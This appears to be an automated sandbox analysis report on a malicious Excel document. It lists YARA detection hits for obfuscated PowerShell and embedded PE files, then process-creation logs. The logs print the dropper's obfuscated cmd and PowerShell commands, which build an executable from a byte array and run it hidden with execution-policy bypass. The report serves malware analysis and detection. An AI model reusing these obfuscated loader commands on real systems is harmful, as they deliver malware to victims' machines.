Source: 00000005.00000002.1636004810.01A69000.00000004.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score = |
Source: 00000005.00000002.1638447073.04EE0000.00000004.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score = |
Source: 00000005.00000002.1635995960.01A60000.00000004.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score = |
Source: 00000005.00000002.1634369984.00150000.00000004.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score = |
Source: 00000005.00000002.1634433896.00190000.00000004.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score = |
Source: 00000005.00000002.1634948704.011C0000.00000004.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score = |
Source: 00000005.00000002.1634387196.00160000.00000008.sdmp, type: MEMORY | Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs |
Source: 00000005.00000002.1634303771.000D0000.00000008.sdmp, type: MEMORY | Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs |
Source: 00000005.00000002.1638385697.04350000.00000004.sdmp, type: MEMORY | Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs |
Source: 00000005.00000002.1638206829.03EE0000.00000008.sdmp, type: MEMORY | Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs |
Source: 00000005.00000002.1635853654.01920000.00000002.sdmp, type: MEMORY | Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs |
Source: 00000005.00000002.1634554312.00220000.00000008.sdmp, type: MEMORY | Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs |
Source: 00000005.00000002.1636329423.01D34000.00000004.sdmp, type: MEMORY | Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs |
Source: 5.2.powershell.exe.4350000.5.unpack, type: UNPACKEDPE | Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs |
Source: 5.2.powershell.exe.d0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs |
Source: 5.2.powershell.exe.d0000.0.unpack, type: UNPACKEDPE | Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs |
Source: 5.2.powershell.exe.4350000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs |
Source: 5.2.powershell.exe.220000.2.unpack, type: UNPACKEDPE | Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs |
Source: 5.2.powershell.exe.160000.1.unpack, type: UNPACKEDPE | Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs |
Source: 5.2.powershell.exe.160000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs |
Source: 5.2.powershell.exe.1920000.3.unpack, type: UNPACKEDPE | Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs |
Source: 5.2.powershell.exe.1920000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs |
Source: 5.2.powershell.exe.220000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs |
Source: 5.2.powershell.exe.3ee0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs |
Source: 5.2.powershell.exe.3ee0000.4.unpack, type: UNPACKEDPE | Matched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs |
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding | |
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c 'sET EQZB= ^& ( $SHelLId[1]+$SHeLliD[13]+'X') ((('^&(0BvSV0Bv) (1gY{0}{1}1gY-f0BvkM'+'0Bv,0Bvq0Bv) ([Byte[]](@(77,90,144,0,3,0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)*7+@(64)+@(0)*35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)*7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)*8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)*7+@(4)'+'+@(0)*8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)*11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)*19+@(96,0,0,12)+@(0)*52+@(32,'+'0,0,8)+'+'@(0)*11+@(8,32,0,0,72)+@(0)*11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)*14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46'+',114,1'+'01,108,111,9 | |
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c%sUG% | |
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHEll -w 1 -NOProF -eP bypAss -nOniNTera -NOloGO SET-VaRiable TO2 ( [TypE]( \'{2}{3}{1}{0}\' -f 'nt','E','Env','IRonM' ) ); ${ExEcUTiOncOntEXt}.\'In`VOKecomM`And\'.( \'{2}{0}{1}\' -f 'nVoKesCRI','pT','i' ).Invoke( ( ( GEt-ITEM VaRiAbLE:To2 ).\'Val`Ue\'::( \'{3}{1}{0}{2}{4}\' -f 'V','TEnvIRONMEnT','AR','GE','IAble' ).Invoke( (\'{0}{1}\' -f'Eq','ZB' ),(\'{1}{0}\'-f 'roCess','P'))) ) | |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c 'sET EQZB= ^& ( $SHelLId[1]+$SHeLliD[13]+'X') ((('^&(0BvSV0Bv) (1gY{0}{1}1gY-f0BvkM'+'0Bv,0Bvq0Bv) ([Byte[]](@(77,90,144,0,3,0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)*7+@(64)+@(0)*35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)*7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)*8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)*7+@(4)'+'+@(0)*8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)*11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)*19+@(96,0,0,12)+@(0)*52+@(32,'+'0,0,8)+'+'@(0)*11+@(8,32,0,0,72)+@(0)*11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)*14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46'+',114,1'+'01,108,111,9 | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd /c%sUG% | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHEll -w 1 -NOProF -eP bypAss -nOniNTera -NOloGO SET-VaRiable TO2 ( [TypE]( \'{2}{3}{1}{0}\' -f 'nt','E','Env','IRonM' ) ); ${ExEcUTiOncOntEXt}.\'In`VOKecomM`And\'.( \'{2}{0}{1}\' -f 'nVoKesCRI','pT','i' ).Invoke( ( ( GEt-ITEM VaRiAbLE:To2 ).\'Val`Ue\'::( \'{3}{1}{0}{2}{4}\' -f 'V','TEnvIRONMEnT','AR','GE','IAble' ).Invoke( (\'{0}{1}\' -f'Eq','ZB' ),(\'{1}{0}\'-f 'roCess','P'))) ) | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c 'sET EQZB= ^& ( $SHelLId[1]+$SHeLliD[13]+'X') ((('^&(0BvSV0Bv) (1gY{0}{1}1gY-f0BvkM'+'0Bv,0Bvq0Bv) ([Byte[]](@(77,90,144,0,3,0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)*7+@(64)+@(0)*35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)*7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)*8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)*7+@(4)'+'+@(0)*8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)*11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)*19+@(96,0,0,12)+@(0)*52+@(32,'+'0,0,8)+'+'@(0)*11+@(8,32,0,0,72)+@(0)*11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)*14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46'+',114,1'+'01,108,111,9 | |
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHEll -w 1 -NOProF -eP bypAss -nOniNTera -NOloGO SET-VaRiable TO2 ( [TypE]( \'{2}{3}{1}{0}\' -f 'nt','E','Env','IRonM' ) ); ${ExEcUTiOncOntEXt}.\'In`VOKecomM`And\'.( \'{2}{0}{1}\' -f 'nVoKesCRI','pT','i' ).Invoke( ( ( GEt-ITEM VaRiAbLE:To2 ).\'Val`Ue\'::( \'{3}{1}{0}{2}{4}\' -f 'V','TEnvIRONMEnT','AR','GE','IAble' ).Invoke( (\'{0}{1}\' -f'Eq','ZB' ),(\'{1}{0}\'-f 'roCess','P'))) ) | |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe cmd /c 'sET EQZB= ^& ( $SHelLId[1]+$SHeLliD[13]+'X') ((('^&(0BvSV0Bv) (1gY{0}{1}1gY-f0BvkM'+'0Bv,0Bvq0Bv) ([Byte[]](@(77,90,144,0,3,0,'+'0,0,4,0,0,0,255,255,0,0,184)+@(0)*7+@(64)+@(0)*35+@(128,0,0,0,14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104,105,115,32,112,114,111'+',103,114,97,109,32,99,97,110,110,111,116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32,109,111,100,101,46,13,13,10,36)+'+'@(0)*7+@(80,69,0,0,76,1,3,0,24,123,118,92)+@(0)*8+@(224,0,2,33,11,1,8,0,0,4,0,0,0,6,'+'0,0,0,0,0,0,126,35,0,0,0,32,0,0,0,64,0,0,0,0,64,0,0,32,0,0,0,2,0,0,4)+@(0)*7+@(4)'+'+@(0)*8'+'+@(128,0,0,0,2,0,0'+',0,0,0'+','+'0,3,0,64,133,0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0,0,0,0,0,16)+@(0)*11+@(36,35,0,0,87,0,0,0,0,64,0,0,160,2)+@(0)*19+@(96,0,0,12)+@(0)*52+@(32,'+'0,0,8)+'+'@(0)*11+@(8,32,0,0,72)+@(0)*11+@(46,116,101,120,116,0,0,0,132,3,0,0,0,32,0,0,0,4,'+'0,0,0,2'+')+'+'@(0)*14+@(32,0,0,96,46,114,115,114,99,0,0,0,160,2,0,0,0,64,'+'0,0,0,4,0,0,0,6)+@(0)*14+@(64,0,0,64,46'+',114,1'+'01,108,111,9 | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErSHEll -w 1 -NOProF -eP bypAss -nOniNTera -NOloGO SET-VaRiable TO2 ( [TypE]( \'{2}{3}{1}{0}\' -f 'nt','E','Env','IRonM' ) ); ${ExEcUTiOncOntEXt}.\'In`VOKecomM`And\'.( \'{2}{0}{1}\' -f 'nVoKesCRI','pT','i' ).Invoke( ( ( GEt-ITEM VaRiAbLE:To2 ).\'Val`Ue\'::( \'{3}{1}{0}{2}{4}\' -f 'V','TEnvIRONMEnT','AR','GE','IAble' ).Invoke( (\'{0}{1}\' -f'Eq','ZB' ),(\'{1}{0}\'-f 'roCess','P'))) ) | Jump to behavior |